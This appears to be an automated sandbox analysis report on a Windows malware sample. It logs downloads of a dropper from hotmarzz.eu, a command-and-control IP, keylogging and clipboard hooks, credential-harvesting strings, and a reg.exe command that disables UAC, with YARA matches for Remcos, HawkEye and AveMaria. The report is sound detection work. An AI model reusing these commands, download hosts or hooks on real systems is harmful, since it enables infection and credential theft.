                    Source: xxTzyGLZx5.exe, 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp, xxTzyGLZx5.exe, 00000001.00000000.660567886.0000000000409000.00000008.00020000.sdmp, xxTzyGLZx5.exe, 00000002.00000000.666223896.0000000000409000.00000008.00020000.sdmp, dwn.exe, 00000023.00000000.746840161.0000000000403000.00000002.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: remcos.exe, 0000001F.00000003.752013552.0000000002255000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.752875827.0000000002255000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                    Source: bin.exe, 00000003.00000003.834239549.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710177902.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706849187.0000000000D94000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833594602.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706749512.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707065597.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706915581.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837896441.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706804145.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840339214.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840815715.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833909279.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845234590.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.720653514.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932808488.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709580311.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.837181130.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706772725.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833790621.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.834673194.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.707076421.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706791322.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706882027.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.833519937.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.834003178.0000000000D85000.00000004.00000001.sdmp, bin.exe, 
00000003.00000003.720698264.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706821542.0000000000DC0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.845559560.0000000000DB0000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.710039428.0000000000D92000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.709560738.0000000000D85000.00000004.00000001.sdmpString found in binary or memory: http://stascorp.comDVarFileInfo$
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                    Source: remcos.exe, 0000001F.00000002.756308956.0000000000193000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
                    Source: remcos.exe, 0000001F.00000003.749222800.0000000002240000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748415147.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749177199.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.748891303.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.749086065.000000000223F000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000003.747996297.0000000002248000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
                    Source: unknown DNS traffic detected: queries for: hotmarzz.eu
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: 4_2_00413468 Sleep,URLDownloadToFileW,4_2_00413468
                    Source: global traffic HTTP traffic detected:
                        GET /goods/Droppertodownloa.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Connection: Keep-Alive
                        Host: hotmarzz.eu
                    Source: global traffic HTTP traffic detected:
                        GET /goods/Droppertodownloa.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: hotmarzz.eu
                        Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected:
                        GET / HTTP/1.1
                        Host: whatismyipaddress.com
                        Connection: Keep-Alive
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
                    Source: global traffic HTTP traffic detected:
                        HTTP/1.1 404 Not Found
                        Date: Tue, 07 Dec 2021 12:38:54 GMT
                        Server: Apache
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Content-Length: 192
                        Keep-Alive: timeout=2, max=90
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=iso-8859-1
                    Source: global traffic HTTP traffic detected:
                        HTTP/1.1 403 Forbidden
                        Date: Tue, 07 Dec 2021 12:40:13 GMT
                        Content-Type: text/plain; charset=UTF-8
                        Content-Length: 16
                        Connection: keep-alive
                        X-Frame-Options: SAMEORIGIN
                        Referrer-Policy: same-origin
                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                        Set-Cookie: __cf_bm=ifc0FPkloiDp4Z1dpnjRqVqzqGMxVbTyrezZskC9KWs-1638880813-0-AXIdIT11xgQ5MMyVhDMcgQ9hAm7CPQjGNWgAvVdJNr0NNS/V7JbsqjReMXqFEa72rdjIhPL268dzLJd98EhxMqI=; path=/; expires=Tue, 07-Dec-21 13:10:13 GMT; domain=.whatismyipaddress.com; HttpOnly
                        Server: cloudflare
                        CF-RAY: 6b9dd23c9d0368fb-FRA
                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                        Data Ascii: error code: 1020
                    Source: unknown TCP traffic detected without corresponding DNS query: 185.157.161.174
                    Source: remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: unknown HTTPS traffic detected: 81.88.52.165:443 -> 192.168.2.4:49739 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    Yara detected HawkEye Keylogger
                    Installs a global keyboard hook
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\bin.exe
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs .Net Code: HookKeyboard
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs .Net Code: HookKeyboard
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: 4_2_004089F0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,4_2_004089F0
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe Code function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404E07
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: 4_2_00413718 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_00413718
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: xxTzyGLZx5.exe, 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp Binary or memory string: GetRawInputData

                    E-Banking Fraud:

                    Yara detected Remcos RAT
                    Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPED
                    Source: Yara match, File source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPED
                    Yara detected AveMaria stealer
                    Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: xxTzyGLZx5.exe, type: UNPACKEDPE, Matched rules: Detects Codoso APT Gh0st Malware (Author: Florian Roth); Detects Encrial credential stealer malware (Author: Florian Roth); AveMaria_WarZone (Author: unknown); REMCOS_RAT_variants (Author: unknown)
                    Source: bin.exe, type: UNPACKEDPE, Matched rules: Detects Codoso APT Gh0st Malware (Author: Florian Roth); Detects Encrial credential stealer malware (Author: Florian Roth); AveMaria_WarZone (Author: unknown)
                    Source: cmd.exe, type: UNPACKEDPE, Matched rules: Detects Codoso APT Gh0st Malware (Author: Florian Roth); Detects Encrial credential stealer malware (Author: Florian Roth); AveMaria_WarZone (Author: unknown)
                    Source: remcos.exe, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants (Author: unknown)
                    Source: rem9090sta.exe, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants (Author: unknown)
                    Source: Windows Update.exe, type: UNPACKEDPE, Matched rules: Detects HawkEye RAT (Author: Kevin Breen <kevin@techanarchy.net>); detect HawkEye in memory (Author: JPCERT/CC Incident Response Group)
                    Source: 5.exe, type: UNPACKEDPE, Matched rules: Detects HawkEye RAT (Author: Kevin Breen <kevin@techanarchy.net>); detect HawkEye in memory (Author: JPCERT/CC Incident Response Group)
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.41ce65.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 29.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.2.Windows Update.exe.4ab0000.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 44.0.Windows Update.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 18.2.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 40.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000001.00000002.677784097.00000000147A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.917761840.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Author: unknown
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000002.916420859.0000000002881000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000002C.00000000.861719615.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPEDMatched rule: AveMaria_WarZone Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                    Writes or reads registry keys via WMI
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2132
                    Source: xxTzyGLZx5.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: rem9090sta.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: remcos.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Droppertodownloa[1].exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: dwn.exe.13.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 21.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 5.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 4.exe.35.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Windows Update.exe.40.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.44.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                    Source: sqlite3.dll.39.drStatic PE information: Number of sections : 19 > 10
                    Source: xxTzyGLZx5.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.2.xxTzyGLZx5.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 3.0.bin.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
